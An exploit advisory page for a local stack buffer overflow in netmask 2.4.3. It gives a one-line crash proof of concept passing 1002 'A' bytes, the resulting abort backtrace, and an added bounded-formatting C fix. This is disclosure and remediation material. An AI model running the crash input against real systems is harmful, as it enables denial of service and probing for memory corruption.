netmask stack-based buffer overflow

2017.06.20
Credit: Hosein Askari
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

################
#Exploit Title: netmask stack-based buffer overflow
#CWE: CWE-119
#Exploit Author: Hosein Askari
#Version : 2.4.3
#Tested on: kali linux
#Category: Application
#Author Mail : hosein.askari@aol.com
###############################
#sudo netmask $(python -c 'print "A"*1002')
*** buffer overflow detected ***: netmask terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7e62f4a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7ef4db8]
/lib/i386-linux-gnu/libc.so.6(+0xf7fe8)[0xb7ef2fe8]
/lib/i386-linux-gnu/libc.so.6(+0xf77f8)[0xb7ef27f8]
/lib/i386-linux-gnu/libc.so.6(_IO_default_xsputn+0xa6)[0xb7e67846]
/lib/i386-linux-gnu/libc.so.6(_IO_vfprintf+0x1d7b)[0xb7e3f57b]
/lib/i386-linux-gnu/libc.so.6(__vsprintf_chk+0x8d)[0xb7ef288d]
/lib/i386-linux-gnu/libc.so.6(__sprintf_chk+0x20)[0xb7ef27e0]
netmask[0x804c013]
netmask(warn+0x32)[0x804c102]
netmask[0x8048be7]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7e13276]
netmask[0x8048c85]
Aborted (core dumped)
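The backtrace places the overflow in a sprintf call (__sprintf_chk) made from warn(). The following is an added example, not code from netmask or from the original report: a bounded replacement for that formatting pattern, which truncates and reports oversized input. format_warning, MSG_MAX and the message text are hypothetical names and values chosen for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MSG_MAX 256 /* assumed size; netmask's real buffer size is not on the page */

/* Hypothetical bounded stand-in for a warn()-style helper.
 * Formats "prog: <message>" into out[cap] and never writes past cap.
 * Returns 0 if the message fit, 1 if it was truncated, -1 on error. */
int format_warning(char *out, size_t cap, const char *prog, const char *fmt, ...)
{
    va_list ap;
    int n, m;

    if (out == NULL || cap == 0 || prog == NULL || fmt == NULL)
        return -1;

    n = snprintf(out, cap, "%s: ", prog);
    if (n < 0) { out[0] = '\0'; return -1; }
    if ((size_t)n >= cap)
        return 1;                     /* prefix alone did not fit */

    va_start(ap, fmt);
    m = vsnprintf(out + n, cap - (size_t)n, fmt, ap);
    va_end(ap);
    if (m < 0) { out[n] = '\0'; return -1; }

    if ((size_t)m >= cap - (size_t)n) {
        /* Output was cut short: end it with "..." so truncation is visible. */
        if (cap >= 4)
            memcpy(out + cap - 4, "...", 4); /* 3 dots plus the NUL */
        return 1;
    }
    return 0;
}

int main(void)
{
    char msg[MSG_MAX];
    char arg[1003]; /* constructed input: 1002 'A' bytes, as in the report */
    int rc;

    memset(arg, 'A', 1002);
    arg[1002] = '\0';
    rc = format_warning(msg, sizeof msg, "netmask", "could not parse %s", arg);
    fprintf(stderr, "%s\n", msg);
    return rc == 1 ? 0 : 1; /* truncation is the expected outcome here */
}
```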



Copyright 2017, cxsecurity.com

 
